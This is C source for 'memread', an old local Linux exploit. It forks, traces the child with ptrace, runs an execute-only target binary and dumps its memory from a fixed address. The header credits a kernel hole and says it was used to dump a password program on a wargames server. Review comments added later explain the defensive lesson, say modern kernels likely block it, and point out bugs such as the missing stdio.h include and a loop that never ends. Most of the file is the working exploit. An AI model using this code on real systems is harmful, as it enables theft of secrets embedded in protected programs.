/*
Program: memread
Program by: lockdown (www.lockeddown.net)

This program exploits a kernel hole lamagra pointed out to me.  If you can execute a program but don't have read permissions on it, you can still read its memory as long as it is not suid or sgid.  I used this program to dump the memory of the password program on drill.hackerslab.org (a wargames box).
Don't forget to edit execl().
address		platform	
0x08048000	x86
0x10000000	ppc
*/

#include <stdlib.h>
#include <signal.h>
#include <syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ptrace.h>

/*
 * File-scope state. Only pid is used in this listing: main() stores the
 * fork() result in it and parent() passes it to ptrace(). i and wait_val are
 * not referenced anywhere in the visible code.
 */
int i = 0;
int wait_val;
int pid;

/*
 * Entry point: fork once, then run child() in the new process and parent()
 * in the original one. A failed fork() is reported through perror() and the
 * program exits with status 1.
 */
main()
{
	pid = fork();

	if (pid == -1) {
		perror("fork");
		exit(1);
	}

	if (pid == 0) {
		child();
	} else {
		parent();
	}
}
/*
 * child - runs in the forked child: asks to be traced, then replaces the
 * process image with the target program.
 *
 * The trace request is made before execl(), so the process is already traced
 * when the new image is loaded; parent() then issues its ptrace requests
 * against the global pid.
 *
 * NOTE(review): neither return value is checked, so a failed ptrace() or
 * execl() goes unreported and control simply returns to main().
 * NOTE(review): the file's header comment states the technique does not apply
 * to suid/sgid targets; nothing in this function checks for that.
 */
child()
{
	/* Tracing request made by the tracee itself; per ptrace(2) the pid, addr
	 * and data arguments are ignored for this request. */
	ptrace(PT_TRACE_ME,getpid(),0,0);
	/* Hard-coded target path and argv[0]; the header comment tells the user to
	 * edit this call for their own target. */
	execl("/bin/pass","pass",NULL);
}
/*
 * parent - runs in the original process: single-steps the traced child once,
 * then reads the child's memory upward from a fixed start address, printing
 * one character to stdout per ptrace() call.
 *
 * Defensive context: per the header comment, this depends on a kernel-side gap
 * where execute-only permissions did not stop a tracer from reading the traced
 * image. Removing read permission from a binary is therefore not a sound way
 * to protect secrets embedded in it.
 * NOTE(review): current Linux kernels are understood to treat a process whose
 * executable the caller cannot read as non-dumpable and to refuse these reads
 * to an unprivileged tracer -- confirm for the kernel in use.
 *
 * NOTE(review): printf() and perror() are used here, but <stdio.h> is not
 * among the includes at the top of the file.
 */
parent()
{
	caddr_t addr;
	char text = 0;
	/* A failure is reported but not acted on; execution continues either way. */
	if(ptrace(PTRACE_SINGLESTEP,pid,0,0) !=0)
		perror("ptrace");
	/* Start address the header comment lists for x86 (it gives 0x10000000 for
	 * ppc). An integer is assigned to caddr_t without a cast. */
	addr = 0x08048000;
	/* No exit condition: the loop runs until the process is killed. */
	while(1)
	{
		/* PTRACE_PEEKDATA returns a whole word as a long; assigning it to a
		 * char keeps only what fits in a char. An error return of -1 is not
		 * distinguished from data, so failed reads are printed as well. */
		text = ptrace(PTRACE_PEEKDATA,pid,addr,0);
		printf("%c",text);
		/* caddr_t is conventionally a char pointer, so this presumably
		 * advances one byte per iteration -- confirm on the target platform. */
		addr+=1;
	}
	/* Unreachable: the loop above never terminates. */
	if(ptrace(PTRACE_SINGLESTEP,pid,0,0) !=0)
		perror("ptrace");
}

